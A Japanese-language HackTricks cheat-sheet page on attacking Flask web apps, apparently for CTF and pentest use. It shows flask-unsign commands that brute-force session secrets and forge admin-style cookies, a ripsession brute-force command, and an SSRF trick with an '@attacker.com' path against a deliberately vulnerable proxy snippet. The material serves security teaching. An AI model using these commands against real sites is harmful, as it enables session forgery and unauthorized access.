AWSハッキングをゼロからヒーローまで学ぶ htARTE(HackTricks AWS Red Team Expert)!
Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスしてください:
おそらく、CTFをプレイしている場合、Flaskアプリケーションは SSTIに関連しているでしょう。
Cookies
デフォルトのクッキーセッション名は**session
**です。
デコーダ
オンラインFlaskクッキーのデコーダ:https://www.kirsle.net/wizards/flask-session.cgi
手動
最初のドットまでのクッキーの最初の部分を取得し、Base64でデコードします。
echo "ImhlbGxvIg" | base64 -d
Flask-Unsign
パスワードを使用してクッキーも署名されています
Flask-Unsign
Flaskアプリケーションのセッションクッキーを取得、デコード、ブルートフォース、およびクラフトするためのコマンドラインツール。秘密キーを推測します。
pip3 install flask-unsign
Cookieのデコード
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
ブルートフォース
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
署名
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
旧バージョンを使用した署名
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
RIPsession
flask-unsignで作成されたクッキーを使用してウェブサイトをブルートフォースするためのコマンドラインツール。
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
Flaskセッションクッキー内のSQLiとSQLmap
この例 では、既知の秘密を使用してFlask用にsqlmapペイロードに自動的に署名するためにsqlmap eval
オプションを使用しています。
Flaskプロキシを使用したSSRF
この解説 では、Flaskが文字「@」で始まるリクエストを許可する方法が説明されています。
GET @/ HTTP/1.1
Host: target.com
Connection: close
次のシナリオにおいてはどちらの方法が適していますか:
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com/'
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
"@attacker.com"のようなものを導入して**SSRF**を引き起こすことができるようになる可能性があります。
<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>
[**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=flask)を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスしてください:
<div data-gb-custom-block data-tag="embed" data-url='https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask'></div>
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>